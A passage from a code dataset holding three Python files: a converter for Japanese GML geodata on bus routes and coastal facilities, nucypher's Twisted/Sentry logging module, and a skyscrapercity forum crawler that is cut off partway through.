\"posList\").text.strip().split(\"\\n\")\n for item in posl:\n entry = item.split(\" \")\n ctrl = ctrl + entry[1] + \" \" + entry[0] + \",\"\n exte = \"(\" + ctrl.strip(\",\") + \")\"\n if rngs.tag == ns_gml + \"interior\":\n segs = rngs.find(\".//\" + ns_gml + \"segments\")\n for seg in segs:\n posl = seg.find(\".//\" + ns_gml + \"posList\").text.strip().split(\"\\n\")\n for item in posl:\n entry = item.split(\" \")\n ctrl = ctrl + entry[1] + \" \" + entry[0] + \",\"\n inte = \"(\" + ctrl.strip(\",\") + \")\"\n parts = exte + \",\" + 
inte\n return \"POLYGON(\" + parts.strip(\",\") + \")\"\n\ndef convertJmp(xmlfile, outdir):\n print(\"Now Processing: \" + xmlfile)\n \n # Read the XML file.\n data = open(xmlfile).read()\n \n # Parsing the XML string.\n root = et.fromstring(data)\n feat_cnt = 0\n \n if root.tag == ns_ksj + \"Dataset\":\n if root.attrib[ns_gml+\"id\"] == \"N07Dataset\":\n parseBusRoute(root, outdir)\n elif root.attrib[ns_gml+\"id\"] == \"P11Dataset\":\n parseBusStop(root, outdir)\n elif root.attrib[ns_gml+\"id\"] == \"C23Dataset\":\n parseCoastLine(root, outdir)\n elif root.attrib[ns_gml+\"id\"] == \"P23Dataset\":\n parseCoastFacilities(root, outdir)\n\ndef parseBusStop(root, outdir):\n strln_busStop = \"\"\n strln_routeInfo = \"\"\n description = root.find(\".//\" + ns_gml + \"description\").text\n busStops = root.findall(\".//\" + ns_ksj + \"BusStop\")\n \n for busStop in busStops:\n uuid = str(busStop.attrib[ns_gml + \"id\"].encode(\"utf-8\"))\n refid = busStop.find(ns_ksj + \"position\").attrib[ns_xln + \"href\"].replace(\"#\",\"\")\n \n busStopName = str(busStop.find(ns_ksj + \"busStopName\").text.encode(\"utf-8\"))\n \n point = root.find(\".//\" + ns_gml + \"Point[@\" + ns_gml + \"id='\" + refid + \"']\")\n wkt_geom = getGmlPoint(point)\n \n strln_busStop = strln_busStop + uuid + \":\" + busStopName + \":\" + wkt_geom + \"\\n\"\n \n routeInfo = busStop.findall(ns_ksj + \"busRouteInformation\")\n for route in routeInfo:\n busType = \"\"\n busTypeCode = route.find(\".//\" + ns_ksj + \"busType\").text\n if busTypeCode == \"1\":\n busType = \"民間バス\"\n elif busTypeCode == \"2\":\n busType = \"公営バス\"\n elif busTypeCode == \"3\":\n busType = \"コミュニティバス\"\n elif busTypeCode == \"4\":\n busType = \"デマンドバス\"\n elif busTypeCode == \"5\":\n busType = \"その他\"\n else:\n busType == \"不明\"\n \n busOperationCompany = str(route.find(\".//\" + ns_ksj + \"busOperationCompany\").text.encode(\"utf-8\"))\n busLineName = str(route.find(\".//\" + ns_ksj + \"busLineName\").text.encode(\"utf-8\"))\n \n strln_routeInfo = strln_routeInfo + uuid + \":\" + busType + \":\" + busOperationCompany + \":\" + busLineName + \"\\n\"\n \n outfile_stop = os.path.join(outdir, 'busStop.txt')\n header_stop = \"id:busStopName:node\\n\"\n openAndWriteDoc(outfile_stop, header_stop, strln_busStop)\n \n outfile_route = os.path.join(outdir, 'busStopRouteInfo.txt')\n header_route = \"id:busType:busOperationCompany:busLineName\\n\"\n openAndWriteDoc(outfile_route, header_route, strln_routeInfo)\n \ndef parseBusRoute(root, outdir):\n strln_busRoute = \"\"\n description = root.find(\".//\" + ns_gml + \"description\").text\n busRoutes = root.findall(\".//\" + ns_ksj + \"BusRoute\")\n \n for busRoute in busRoutes:\n uuid = busRoute.attrib[ns_gml + \"id\"]\n refid = busRoute.find(ns_ksj + \"brt\").attrib[ns_xln + \"href\"].replace(\"#\",\"\")\n \n busType = None\n busTypeCode = busRoute.find(ns_ksj + \"bsc\").text\n if busTypeCode == \"1\":\n busType = \"民間バス\"\n elif busTypeCode == \"2\":\n busType = \"公営バス\"\n elif busTypeCode == \"3\":\n busType = \"コミュニティバス\"\n elif busTypeCode == \"4\":\n busType = \"デマンドバス\"\n elif busTypeCode == \"5\":\n busType = \"その他\"\n else:\n busType == \"不明\"\n \n company = str(busRoute.find(ns_ksj + \"boc\").text.encode(\"utf-8\"))\n lineName = str(busRoute.find(ns_ksj + \"bln\").text.encode(\"utf-8\"))\n linesPerDay = str(busRoute.find(ns_ksj + \"rpd\").text.encode(\"utf-8\"))\n linesPerSat = str(busRoute.find(ns_ksj + \"rps\").text.encode(\"utf-8\"))\n linesPerSun = str(busRoute.find(ns_ksj + 
\"rph\").text.encode(\"utf-8\"))\n \n edge = root.find(\".//\" + ns_gml + \"Curve[@\" + ns_gml + \"id='\" + refid + \"']\")\n wkt_geom = getGmlPolyline(edge)\n \n strln_busRoute = strln_busRoute + uuid + \":\" + busType + \":\" + company + \":\" + lineName + \":\" + linesPerDay + \":\" + linesPerSat + \":\" + linesPerSun + \":\" + wkt_geom + \"\\n\"\n \n outfile = os.path.join(outdir, 'busRoute.txt')\n header = \"id:busType:busOperationCompany:busLineName:linesPerWorkday:linesPerSat:linesPerSun:edge\\n\"\n openAndWriteDoc(outfile, header, strln_busRoute)\n\ndef parseCoastLine(root, outdir):\n strln_coastLine = \"\"\n description = root.find(\".//\" + ns_gml + \"description\").text\n coastLines = root.findall(\".//\" + ns_ksj + \"Coastline\")\n \n for coastLine in coastLines:\n uuid = coastLine.attrib[ns_gml + \"id\"]\n refid = coastLine.find(ns_ksj + \"location\").attrib[ns_xln + \"href\"].replace(\"#\",\"\")\n \n adminCode = \"\"\n compAuthCode = \"\"\n compAuth = \"\"\n areaNumber = \"\"\n areaName = \"\"\n coastAdminCode = \"\"\n coastAdmin = \"\"\n coastAdminName = \"\"\n branchingBay = \"\"\n \n if not coastLine.find(ns_ksj + \"administrativeAreaCode\") == None:\n adminCode = str(coastLine.find(ns_ksj + \"administrativeAreaCode\").text.encode(\"utf-8\")) # 行政区域コード\n \n if not coastLine.find(ns_ksj + \"competentAuthorities\") == None:\n compAuthCode = str(coastLine.find(ns_ksj + \"competentAuthorities\").text.encode(\"utf-8\")) # 所管官庁コード\n \n # Decode the competent authorities code.\n if compAuthCode == \"1\":\n compAuth = \"国土交通省河川局\"\n elif compAuthCode == \"2\":\n compAuth = \"国土交通省港湾局\"\n elif compAuthCode == \"3\":\n compAuth = \"農林水産省農村振興局\"\n elif compAuthCode == \"4\":\n compAuth = \"農林水産省水産庁\"\n elif compAuthCode == \"5\":\n compAuth = \"農振河川共管\"\n elif compAuthCode == \"6\":\n compAuth = \"不明(原典資料を入手できなかった場合)\"\n elif compAuthCode == \"7\":\n compAuth = \"不明(原典資料をデータ化できなかった場合)\"\n elif compAuthCode == \"0\":\n compAuth = \"その他\"\n else:\n compAuth = \"unknown\"\n \n if not coastLine.find(ns_ksj + \"areaNumber\") == None:\n areaNumber = str(coastLine.find(ns_ksj + \"areaNumber\").text.encode(\"utf-8\")) # 海岸保全区域番号\n if not coastLine.find(ns_ksj + \"areaName\") == None:\n areaName = str(coastLine.find(ns_ksj + \"areaName\").text.encode(\"utf-8\")) # 海岸保全区域・海岸名\n if not coastLine.find(ns_ksj + \"administrator\") == None:\n coastAdminCode = str(coastLine.find(ns_ksj + \"administrator\").text.encode(\"utf-8\")) # 海岸保全区域・海岸管理者\n \n # Decode the coast line administrator code.\n if coastAdminCode == \"1\":\n coastAdmin = \"都道府県知事\"\n elif coastAdminCode == \"2\":\n coastAdmin = \"市町村長\"\n elif coastAdminCode == \"3\":\n coastAdmin = \"一般事務組合\"\n elif coastAdminCode == \"4\":\n coastAdmin = \"港務局\"\n elif coastAdminCode == \"9\":\n coastAdmin = \"不明\"\n elif coastAdminCode == \"0\":\n coastAdmin = \"その他\"\n else:\n compAuth = \"unknown\"\n if not coastLine.find(ns_ksj + \"administratorname\") == None:\n coastAdminName = str(coastLine.find(ns_ksj + \"administratorname\").text.encode(\"utf-8\")) # 海岸保全区域・海岸管理者名\n if not coastLine.find(ns_ksj + \"branchingBay\") == None:\n branchingBay = str(coastLine.find(ns_ksj + \"branchingBay\").text.encode(\"utf-8\")) # 河口\n \n edge = root.find(\".//\" + ns_gml + \"Curve[@\" + ns_gml + \"id='\" + refid + \"']\") # 場所\n wkt_geom = getGmlPolyline(edge)\n \n strln_coastLine = strln_coastLine + uuid + \":\" + adminCode + \":\" + compAuth + \":\" + areaNumber + \":\" + areaName + \":\" + coastAdmin + \":\" + coastAdminName + \":\" + branchingBay + \":\" 
+ wkt_geom + \"\\n\"\n \n outfile = os.path.join(outdir, 'coastLine.txt')\n header = \"id:administrativeAreaCode:competentAuthorities:areaNumber:areaName:administrator:administratorname:branchingBay:edge\\n\"\n openAndWriteDoc(outfile, header, strln_coastLine)\n\ndef parseCoastFacilities(root, outdir):\n strln_Facilities = \"\"\n strln_Facilities_pt = \"\"\n strln_Facilities_cv = \"\"\n \n description = root.find(\".//\" + ns_gml + \"description\").text\n facilities_pts = root.findall(\".//\" + ns_ksj + \"CoastalFacilities_Point\")\n facilities_lns = root.findall(\".//\" + ns_ksj + \"CoastalFacilities_Line\")\n \n for facilities_pt in facilities_pts:\n uuid = facilities_pt.attrib[ns_gml + \"id\"]\n uuid2 = uuid.replace(\"_P_\",\"_\")\n refid = facilities_pt.find(ns_ksj + \"position\").attrib[ns_xln + \"href\"].replace(\"#\",\"\")\n \n adminCode = \"\" # 行政コード\n compAuth = \"\" # 所管省庁\n facilAdmin = \"\" # 管理者\n baseLevel = \"\" # 基準面\n MaxPresent = \"\" # 天端高最大(現況)\n MinPresent = \"\" # 天端高最小(現況)\n MaxPlan = \"\" # 天端高最大(計画)\n MinPlan = \"\" # 天端高最小(計画)\n \n elem_adminCode = facilities_pt.find(ns_ksj + \"administrativeAreaCode\")\n elem_compAuth = facilities_pt.find(ns_ksj + \"competentAuthority\")\n elem_facilAdmin = facilities_pt.find(ns_ksj + \"administrator\")\n elem_baseLevel = facilities_pt.find(ns_ksj + \"baseLevel\")\n elem_MaxPresent = facilities_pt.find(ns_ksj + \"copeLevelMaxPresent\")\n elem_MinPresent = facilities_pt.find(ns_ksj + \"copeLevelMinPresent\")\n elem_MaxPlan = facilities_pt.find(ns_ksj + \"copeLevelMaxPlan\")\n elem_MinPlan = facilities_pt.find(ns_ksj + \"copeLevelMinPlan\")\n \n if not elem_adminCode == None:\n if not elem_adminCode.text == None:\n adminCode = elem_adminCode.text.encode(\"utf-8\") # 行政区域コード\n if not elem_compAuth == None:\n if not elem_compAuth.text == None:\n compAuth = elem_compAuth.text.encode(\"utf-8\") # 所管官庁\n if not elem_facilAdmin == None:\n if not elem_facilAdmin.text == None:\n facilAdmin = elem_facilAdmin.text.encode(\"utf-8\") # 管理者\n if not elem_baseLevel == None:\n if not elem_baseLevel.text == None:\n baseLevel = elem_baseLevel.text.encode(\"utf-8\") # 基準面\n if not elem_MaxPresent == None:\n if not elem_MaxPresent.text == None:\n MaxPresent = elem_MaxPresent.text.encode(\"utf-8\") # 天端高最大(現況)\n if not elem_MinPresent == None:\n if not elem_MinPresent.text == None:\n MinPresent = elem_MinPresent.text.encode(\"utf-8\") # 天端高最小(現況)\n if not elem_MaxPlan == None:\n if not elem_MaxPlan.text == None:\n MaxPlan = elem_MaxPlan.text.encode(\"utf-8\") # 天端高最大(計画)\n if not elem_MinPlan == None:\n if not elem_MinPlan.text == None:\n MinPlan = elem_MinPlan.text.encode(\"utf-8\") # 天端高最小(計画)\n \n facilityType_bank = \"\"\n facilityType_groin = \"\"\n facilityType_bankProtection = \"\"\n facilityType_breastWall = \"\"\n facilityType_offshoreBreakwater = \"\"\n facilityType_sandyBeach = \"\"\n facilityType_otherFacilities = \"\"\n \n facilityTypes = facilities_pt.find(ns_ksj + \"facilityType\")\n \n for facilityType in facilityTypes:\n elem_facilityType_bank = facilityType.find(\".//\" + ns_ksj + \"bank\")\n elem_facilityType_groin = facilityType.find(\".//\" + ns_ksj + \"groin\")\n elem_facilityType_bankProtection = facilityType.find(\".//\" + ns_ksj + \"bankProtection\")\n elem_facilityType_breastWall = facilityType.find(\".//\" + ns_ksj + \"breastWall\")\n elem_facilityType_offshoreBreakwater = facilityType.find(\".//\" + ns_ksj + \"offshoreBreakwater\")\n elem_facilityType_sandyBeach = facilityType.find(\".//\" + ns_ksj + \"sandyBeach\")\n 
elem_facilityType_otherFacilities = facilityType.find(\".//\" + ns_ksj + \"otherFacilities\")\n \n if not elem_facilityType_bank.text == None:\n facilityType_bank = elem_facilityType_bank.text.encode(\"utf-8\") # 堤防\n if not elem_facilityType_groin.text == None:\n facilityType_groin = elem_facilityType_groin.text.encode(\"utf-8\") # 突堤\n if not elem_facilityType_bankProtection.text == None:\n facilityType_bankProtection = elem_facilityType_bankProtection.text.encode(\"utf-8\") # 護岸\n if not elem_facilityType_breastWall.text == None:\n facilityType_breastWall = elem_facilityType_breastWall.text.encode(\"utf-8\") # 胸壁\n if not elem_facilityType_offshoreBreakwater.text == None:\n facilityType_offshoreBreakwater = elem_facilityType_offshoreBreakwater.text.encode(\"utf-8\")# 離岸堤\n if not elem_facilityType_sandyBeach.text == None:\n facilityType_sandyBeach = elem_facilityType_sandyBeach.text.encode(\"utf-8\") # 砂浜\n if not elem_facilityType_otherFacilities.text == None:\n facilityType_otherFacilities = elem_facilityType_otherFacilities.text.encode(\"utf-8\") # その他の施設 \n \n strln_Facilities = strln_Facilities + uuid2 + \":\" + adminCode + \":\" + compAuth + \":\" + facilAdmin + \":\" + \\\n baseLevel + \":\" + MaxPresent + \":\" + MaxPlan + \":\" + MinPlan + \":\" + \\\n facilityType_bank + \":\" + facilityType_groin + \":\" + facilityType_bankProtection + \":\" + \\\n facilityType_breastWall + \":\" + facilityType_offshoreBreakwater + \":\" + facilityType_sandyBeach + \":\" + \\\n facilityType_otherFacilities + \"\\n\"\n \n point = root.find(\".//\" + ns_gml + \"Point[@\" + ns_gml + \"id='\" + refid + \"']\")\n wkt_geom = getGmlPoint(point)\n \n strln_Facilities_pt = strln_Facilities_pt + uuid + \":\" + uuid2 + \":\" + wkt_geom + \"\\n\"\n \n outfile_attrib = os.path.join(outdir, 'coastFacilities.txt')\n header_attrib = \"id:AdministratorCode:competentAuthority:Administrator:baseLevel:copeLevelMaxPresent:copeLevelMinPresent:copeLevelMaxPlan:copeLevelMinPlan\\n\"\n openAndWriteDoc(outfile_attrib, header_attrib, strln_Facilities)\n \n outfile_point = os.path.join(outdir, 'coastFacilities_point.txt')\n header_point = \"id:id2:point\\n\"\n openAndWriteDoc(outfile_point, header_point, strln_Facilities_pt)\n \n for facilities_ln in facilities_lns:\n uuid = facilities_ln.attrib[ns_gml + \"id\"]\n uuid2 = uuid.replace(\"_P_\",\"_\")\n refid = facilities_ln.find(ns_ksj + \"location\").attrib[ns_xln + \"href\"].replace(\"#\",\"\")\n \n adminCode = \"\" # 行政コード\n compAuth = \"\" # 所管省庁\n facilAdmin = \"\" # 管理者\n baseLevel = \"\" # 基準面\n MaxPresent = \"\" # 天端高最大(現況)\n MinPresent = \"\" # 天端高最小(現況)\n MaxPlan = \"\" # 天端高最大(計画)\n MinPlan = \"\" # 天端高最小(計画)\n \n elem_adminCode = facilities_ln.find(ns_ksj + \"administrativeAreaCode\")\n elem_compAuth = facilities_ln.find(ns_ksj + \"competentAuthority\")\n elem_facilAdmin = facilities_ln.find(ns_ksj + \"administrator\")\n elem_baseLevel = facilities_ln.find(ns_ksj + \"baseLevel\")\n elem_MaxPresent = facilities_ln.find(ns_ksj + \"copeLevelMaxPresent\")\n elem_MinPresent = facilities_ln.find(ns_ksj + \"copeLevelMinPresent\")\n elem_MaxPlan = facilities_ln.find(ns_ksj + \"copeLevelMaxPlan\")\n elem_MinPlan = facilities_ln.find(ns_ksj + \"copeLevelMinPlan\")\n \n if not elem_adminCode == None:\n if not elem_adminCode.text == None:\n adminCode = elem_adminCode.text.encode(\"utf-8\") # 行政区域コード\n if not elem_compAuth == None:\n if not elem_compAuth.text == None:\n compAuth = elem_compAuth.text.encode(\"utf-8\") # 所管官庁\n if not elem_facilAdmin == None:\n if not 
elem_facilAdmin.text == None:\n facilAdmin = elem_facilAdmin.text.encode(\"utf-8\") # 管理者\n if not elem_baseLevel == None:\n if not elem_baseLevel.text == None:\n baseLevel = elem_baseLevel.text.encode(\"utf-8\") # 基準面\n if not elem_MaxPresent == None:\n if not elem_MaxPresent.text == None:\n MaxPresent = elem_MaxPresent.text.encode(\"utf-8\") # 天端高最大(現況)\n if not elem_MinPresent == None:\n if not elem_MinPresent.text == None:\n MinPresent = elem_MinPresent.text.encode(\"utf-8\") # 天端高最小(現況)\n if not elem_MaxPlan == None:\n if not elem_MaxPlan.text == None:\n MaxPlan = elem_MaxPlan.text.encode(\"utf-8\") # 天端高最大(計画)\n if not elem_MinPlan == None:\n if not elem_MinPlan.text == None:\n MinPlan = elem_MinPlan.text.encode(\"utf-8\") # 天端高最小(計画)\n \n facilityType_bank = \"\"\n facilityType_groin = \"\"\n facilityType_bankProtection = \"\"\n facilityType_breastWall = \"\"\n facilityType_offshoreBreakwater = \"\"\n facilityType_sandyBeach = \"\"\n facilityType_otherFacilities = \"\"\n \n facilityTypes = facilities_ln.find(ns_ksj + \"facilityType\")\n \n for facilityType in facilityTypes:\n elem_facilityType_bank = facilityType.find(\".//\" + ns_ksj + \"bank\")\n elem_facilityType_groin = facilityType.find(\".//\" + ns_ksj + \"groin\")\n elem_facilityType_bankProtection = facilityType.find(\".//\" + ns_ksj + \"bankProtection\")\n elem_facilityType_breastWall = facilityType.find(\".//\" + ns_ksj + \"breastWall\")\n elem_facilityType_offshoreBreakwater = facilityType.find(\".//\" + ns_ksj + \"offshoreBreakwater\")\n elem_facilityType_sandyBeach = facilityType.find(\".//\" + ns_ksj + \"sandyBeach\")\n elem_facilityType_otherFacilities = facilityType.find(\".//\" + ns_ksj + \"otherFacilities\")\n \n if not elem_facilityType_bank.text == None:\n facilityType_bank = elem_facilityType_bank.text.encode(\"utf-8\") # 堤防\n if not elem_facilityType_groin.text == None:\n facilityType_groin = elem_facilityType_groin.text.encode(\"utf-8\") # 突堤\n if not elem_facilityType_bankProtection.text == None:\n facilityType_bankProtection = elem_facilityType_bankProtection.text.encode(\"utf-8\") # 護岸\n if not elem_facilityType_breastWall.text == None:\n facilityType_breastWall = elem_facilityType_breastWall.text.encode(\"utf-8\") # 胸壁\n if not elem_facilityType_offshoreBreakwater.text == None:\n facilityType_offshoreBreakwater = elem_facilityType_offshoreBreakwater.text.encode(\"utf-8\")# 離岸堤\n if not elem_facilityType_sandyBeach.text == None:\n facilityType_sandyBeach = elem_facilityType_sandyBeach.text.encode(\"utf-8\") # 砂浜\n if not elem_facilityType_otherFacilities.text == None:\n facilityType_otherFacilities = elem_facilityType_otherFacilities.text.encode(\"utf-8\") # その他の施設\n \n strln_Facilities = strln_Facilities + uuid + \":\" + uuid2 + \":\" + adminCode + \":\" + compAuth + \":\" + facilAdmin + \":\" + \\\n baseLevel + \":\" + MaxPresent + \":\" + MaxPlan + \":\" + MinPlan + \":\" + \\\n facilityType_bank + \":\" + facilityType_groin + \":\" + facilityType_bankProtection + \":\" + \\\n facilityType_breastWall + \":\" + facilityType_offshoreBreakwater + \":\" + facilityType_sandyBeach + \":\" + \\\n facilityType_otherFacilities + \"\\n\"\n \n edge = root.find(\".//\" + ns_gml + \"Curve[@\" + ns_gml + \"id='\" + refid + \"']\") # 場所\n wkt_geom = getGmlPolyline(edge)\n \n strln_Facilities_cv = strln_Facilities_cv + uuid + \":\" + uuid2 + \":\" + wkt_geom + \"\\n\"\n \n openAndWriteDoc(outfile_attrib, header_attrib, strln_Facilities)\n uniqlines = set(open(outfile_attrib).readlines())\n new_outfile_attrib = 
open(outfile_attrib, 'w')\n    new_outfile_attrib.writelines(uniqlines)\n    new_outfile_attrib.close()\n    \n    outfile_line = os.path.join(outdir, 'coastFacilities_line.txt')\n    header_line = \"id:id2:point\\n\"\n    openAndWriteDoc(outfile_line, header_line, strln_Facilities_cv)\n    \n#convertJmp('/home/yufujimoto/Desktop/N07-11_29_GML/N07-11_29.xml','/home/yufujimoto/Desktop' )\n#convertJmp('/home/yufujimoto/Desktop/P11-10_29_GML/P11-10_29-jgd-g.xml','/home/yufujimoto/Desktop' )\n#convertJmp('/home/yufujimoto/Desktop/C23-06_47_GML/C23-06_47-g.xml','/home/yufujimoto/Desktop' )\nconvertJmp('/home/yufujimoto/Desktop/P23-12_01_GML/P23-12_01.xml','/home/yufujimoto/Desktop')","repo_name":"yufujimoto/kibanchizu-converter","sub_path":"jmp.py","file_name":"jmp.py","file_ext":"py","file_size_in_byte":24433,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"69989795911","text":"\n\n\nimport pathlib\nfrom contextlib import contextmanager\n\nfrom twisted.logger import (\n    FileLogObserver,\n    LogLevel,\n    formatEvent,\n    formatEventAsClassicLogText,\n    globalLogPublisher,\n    jsonFileLogObserver,\n)\nfrom twisted.logger import Logger as TwistedLogger\nfrom twisted.python.logfile import LogFile\n\nimport nucypher\nfrom nucypher.config.constants import (\n    DEFAULT_JSON_LOG_FILENAME,\n    DEFAULT_LOG_FILENAME,\n    NUCYPHER_SENTRY_ENDPOINT,\n    USER_LOG_DIR,\n)\n\nONE_MEGABYTE = 1_048_576\nMAXIMUM_LOG_SIZE = ONE_MEGABYTE * 10\nMAX_LOG_FILES = 10\n\n\ndef initialize_sentry(dsn: str):\n    try:\n        import sentry_sdk\n        from sentry_sdk.integrations.logging import LoggingIntegration\n    except ImportError:\n        raise ImportError('Sentry SDK is not installed. Please install it and try again.')\n\n    import logging\n\n    # Logger ignore list\n    ignored_loggers = ()\n\n    def before_breadcrumb(crumb, hint):\n        logger = crumb.get('category')\n        if logger in ignored_loggers:\n            return\n        return crumb\n\n    def before_send(event, hint):\n        logger = event.get('logger')\n        if logger in ignored_loggers:\n            return\n        return event\n\n    sentry_logging = LoggingIntegration(\n        level=logging.DEBUG,  # Capture debug and above as breadcrumbs\n        event_level=logging.ERROR  # Send errors as events\n    )\n    sentry_sdk.init(\n        dsn=dsn,\n        release=nucypher.__version__,\n        integrations=[sentry_logging],\n        before_breadcrumb=before_breadcrumb,\n        before_send=before_send\n    )\n\n\nclass GlobalLoggerSettings:\n\n    log_level = LogLevel.levelWithName(\"info\")\n    _json_ipc = False  # TODO: Oh no... 
#1754\n\n @classmethod\n def set_log_level(cls, log_level_name):\n cls.log_level = LogLevel.levelWithName(log_level_name)\n\n @classmethod\n def start_console_logging(cls):\n globalLogPublisher.addObserver(console_observer)\n\n @classmethod\n def stop_console_logging(cls):\n globalLogPublisher.removeObserver(console_observer)\n\n @classmethod\n @contextmanager\n def pause_all_logging_while(cls):\n former_observers = tuple(globalLogPublisher._observers)\n for observer in former_observers:\n globalLogPublisher.removeObserver(observer)\n yield\n for observer in former_observers:\n globalLogPublisher.addObserver(observer)\n\n @classmethod\n def start_text_file_logging(cls):\n globalLogPublisher.addObserver(get_text_file_observer())\n\n @classmethod\n def stop_text_file_logging(cls):\n globalLogPublisher.removeObserver(get_text_file_observer())\n\n @classmethod\n def start_json_file_logging(cls):\n globalLogPublisher.addObserver(get_json_file_observer())\n\n @classmethod\n def stop_json_file_logging(cls):\n globalLogPublisher.removeObserver(get_json_file_observer())\n\n @classmethod\n def start_sentry_logging(cls, dsn: str):\n _SentryInitGuard.init(dsn)\n globalLogPublisher.addObserver(sentry_observer)\n\n @classmethod\n def stop_sentry_logging(cls):\n globalLogPublisher.removeObserver(sentry_observer)\n\n\ndef console_observer(event):\n if event['log_level'] >= GlobalLoggerSettings.log_level:\n print(formatEvent(event))\n\n\nclass _SentryInitGuard:\n initialized = False\n dsn = None\n\n @classmethod\n def init(cls, dsn: str = NUCYPHER_SENTRY_ENDPOINT):\n if not cls.initialized:\n initialize_sentry(dsn)\n else:\n raise ValueError(f\"Sentry has been already initialized with DSN {cls.dsn}\")\n\n\ndef sentry_observer(event):\n try:\n from sentry_sdk import add_breadcrumb, capture_exception\n except ImportError:\n raise ImportError('Sentry SDK is not installed. 
Please install it and try again.')\n\n # Handle breadcrumbs...\n if not event.get('isError') or 'failure' not in event:\n add_breadcrumb(level=event.get('log_level').name,\n message=event.get('log_format'),\n category=event.get('log_namespace'))\n return\n\n # ...Handle Failures\n f = event['failure']\n capture_exception((f.type, f.value, f.getTracebackObject()))\n\n\ndef _ensure_dir_exists(path):\n pathlib.Path(path).mkdir(parents=True, exist_ok=True)\n\n\ndef get_json_file_observer(name=DEFAULT_JSON_LOG_FILENAME, path=USER_LOG_DIR):\n _ensure_dir_exists(path)\n logfile = LogFile(name=name, directory=path, rotateLength=MAXIMUM_LOG_SIZE, maxRotatedFiles=MAX_LOG_FILES)\n observer = jsonFileLogObserver(outFile=logfile)\n return observer\n\n\ndef get_text_file_observer(name=DEFAULT_LOG_FILENAME, path=USER_LOG_DIR):\n _ensure_dir_exists(path)\n logfile = LogFile(name=name, directory=path, rotateLength=MAXIMUM_LOG_SIZE, maxRotatedFiles=MAX_LOG_FILES)\n observer = FileLogObserver(formatEvent=formatEventAsClassicLogText, outFile=logfile)\n return observer\n\n\nclass Logger(TwistedLogger):\n \"\"\"Drop-in replacement of Twisted's Logger, patching the emit() method to tolerate inputs with curly braces,\n i.e., not compliant with PEP 3101.\n\n See Issue #724 and, particularly, https://github.com/nucypher/nucypher/issues/724#issuecomment-600190455\"\"\"\n\n @classmethod\n def escape_format_string(cls, string):\n \"\"\"\n Escapes all curly braces from a PEP-3101's format string.\n \"\"\"\n escaped_string = string.replace(\"{\", \"{{\").replace(\"}\", \"}}\")\n return escaped_string\n\n def emit(self, level, format=None, **kwargs):\n clean_format = self.escape_format_string(str(format))\n super().emit(level=level, format=clean_format, **kwargs)\n","repo_name":"nucypher/nucypher","sub_path":"nucypher/utilities/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":5625,"program_lang":"python","lang":"en","doc_type":"code","stars":686,"dataset":"github-code","pt":"27"} +{"seq_id":"11173932352","text":"#!/usr/bin/env python\n\nimport re\nimport argparse\nfrom urllib.request import Request, urlopen\nfrom urllib.parse import urljoin\nfrom urllib.error import URLError\n\nfrom bs4 import BeautifulSoup\nfrom progress.spinner import Spinner\n\nfrom skycrawler import database\nfrom skycrawler import utils\n\n\nclass Crawler:\n\n def __init__(self, init_db=False):\n\n if init_db:\n database.drop_db()\n database.init_db()\n\n # Init url index with previously fetch buildings\n self._buildings = utils.get_building_index()\n self._cities = utils.get_city_index()\n self._new_buildings = 0\n\n # Index an individual page\n def add_to_index(self, url, values):\n city = values[0]\n city_key = values[0].lower().replace(' ', '')\n name = values[1]\n height = None\n floors = None\n latitude = None\n longitude = None\n status = values[-1]\n for value in values:\n if height is None:\n reg_height_m = re.match(r'~?\\+?(?P\\d{3,})m', value)\n reg_height_ft = re.match(r'~?\\+?(?P\\d{3,})ft', value)\n if reg_height_m:\n height = reg_height_m.group('height')\n elif reg_height_ft:\n height = reg_height_ft.group('height')\n height = int(int(height) * 0.3048)\n\n if floors is None:\n reg_floors = re.match(r'(?P\\d{2,})~?\\+? 
fl', value)\n if reg_floors:\n floors = reg_floors.group('floors')\n\n if self._cities.get(city_key):\n city_id = self._cities[city_key]\n else:\n city_id = utils.insert_city(city, latitude, longitude)\n self._cities[city_key] = city_id\n utils.insert_building(name, height, floors, url, city_id, status)\n self._buildings.append(utils.sanitize_building(city, name))\n self._new_buildings += 1\n\n @staticmethod\n def update_city_coordonates():\n utils.update_city_coordinates()\n\n # Extract the text from an HTML page (no tags)\n def get_text_only(self, soup):\n v = soup.string\n if v is None:\n c = soup.contents\n result_text = ''\n for t in c:\n subtext = self.get_text_only(t)\n result_text += subtext+'\\n'\n return result_text\n else:\n return v.strip()\n\n # Separate the words by any non-whitespace character\n @staticmethod\n def split_words(text):\n return [x.strip() for x in text.split('|')]\n\n # Return true if this url is already indexed\n def is_indexed(self, values):\n return utils.sanitize_building(values[0], values[1]) in self._buildings\n\n @staticmethod\n def is_thread(url):\n return '/threads/' in url\n\n @staticmethod\n def is_first_page(url):\n return '&page=' not in url\n\n @staticmethod\n def is_useful(url):\n return url.startswith('https://www.skyscrapercity') and Crawler.is_first_page(url) and Crawler.is_thread(url)\n\n @staticmethod\n def is_menu(url):\n return url.startswith('https://www.skyscrapercity') and not Crawler.is_thread(url)\n\n # Starting with a list of pages, do a breadth\n # first search to the given depth, indexing pages\n # as we go\n def crawl(self, pages, depth=1):\n spinner = Spinner('Searching ')\n for i in range(depth):\n newpages = []\n for page in pages:\n try:\n headers = {'User-Agent': 'Mozilla/5.0'}\n req = Request(page, None, headers)\n c = urlopen(req)\n except URLError as e:\n print(e)\n print(\"Could not open %s\" % page)\n continue\n soup = BeautifulSoup(c.read(), \"html.parser\")\n\n links = soup('a')\n for link in links:\n if 'href' in dict(link.attrs):\n url = urljoin(page, link['href'])\n url = url.split('#')[0] # remove location portion\n values = self.split_words(link.getText())\n if len(values) > 3 and self.is_useful(url) and not self.is_indexed(values):\n self.add_to_index(url, values)\n # We only parse forum menu pages since they contain thread titles\n if self.is_menu(url) and url not in pages:\n newpages.append(url)\n spinner.next()\n # Update pages to crawl\n pages = newpages\n\n def display_and_save_stats(self):\n print(f'Found {self._new_buildings} new buildings for a grand total of {len(self._buildings)}.')\n utils.insert_synchronization(self._new_buildings)\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Crawler to get latest skyscrapers developpment.')\n\n parser.add_argument('--init-db', dest='init_db', action='store_true',\n help=\"Init database, drop if already exist\")\n parser.set_defaults(init_db=False)\n parser.add_argument(\"-d\", \"--depth\", type=int, default=1,\n help=\"The depth used to crawl the site\")\n\n args = parser.parse_args()\n\n crawler = Crawler(args.init_db)\n\n forums = ['https://www.skyscrapercity.com/forums/skyscrapers.1720/',\n 